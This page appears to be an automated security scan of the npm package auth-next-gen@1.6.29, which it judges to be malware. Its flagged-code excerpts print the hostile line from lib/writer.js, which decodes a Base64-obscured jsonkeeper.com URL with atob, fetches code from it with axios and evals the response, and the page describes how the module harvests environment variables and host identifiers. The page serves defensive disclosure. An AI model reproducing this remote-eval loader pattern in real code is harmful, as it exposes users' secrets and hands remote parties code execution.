registry  /  auth-next-gen  /  1.6.29

auth-next-gen@1.6.29

auth-next-gen is a lightweight npm module that synchronizes authentication state between server-side rendered (SSR) pages and client-side applications

AI Security Review

scanned 2h ago · by lpm-firewall-ai

The package performs import-time remote code retrieval and eval. It also collects environment variables and host identifiers in the same module scope.

Static reason
One or more suspicious static signals were detected.
Trigger
require/import auth-next-gen
Impact
Remote arbitrary JavaScript execution in the consumer process with access to environment and host data.
Mechanism
Base64-obscured remote JavaScript fetch followed by eval
Attack narrative
The main entrypoint index.js requires lib/writer.js immediately. lib/writer.js gathers process.env, platform, hostname, username, and MAC addresses, then calls axios.get on a Base64-obscured jsonkeeper.com URL and evals r.data.data from the response. That gives the remote endpoint execution in any process that imports the package.
Rationale
Direct source inspection confirms import-time remote code execution from an obscured external endpoint plus local environment and host data collection. This is not aligned with the package description and is concrete malicious behavior.
Evidence
package.jsonindex.jslib/writer.js
Network endpoints1
www.jsonkeeper.com/b/PJNZP

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js requires ./lib/writer at module load.
  • lib/writer.js constructs data from process.env, os.hostname(), os.userInfo().username, platform, and MAC addresses.
  • lib/writer.js fetches Base64-decoded https://www.jsonkeeper.com/b/PJNZP via axios.
  • lib/writer.js evals r.data.data from the remote response.
  • package.json has no install hooks, but main points to index.js so import triggers writer load.
Evidence against
  • No npm lifecycle scripts were present in package.json.
  • No AI-agent control-surface writes found in inspected entrypoint files.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 17 file(s), 52.8 KB of source, external domains: github.com

Source & flagged code

4 flagged · loading source
lib/writer.jsView file
28L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);}); L30:
High
Eval

Package source references dynamic code evaluation.

lib/writer.jsView on unpkg · L28
20const data = { L21: ...process.env, L22: version: pkg.subModuleVersion, ... L28: L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);}); L30:
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/writer.jsView on unpkg · L20
28L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);}); L30:
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/writer.jsView on unpkg · L28
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

4 High3 Medium3 Low
HighChild Process
HighEvallib/writer.js
HighSame File Env Network Executionlib/writer.js
HighBase64 Obscured Urllib/writer.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings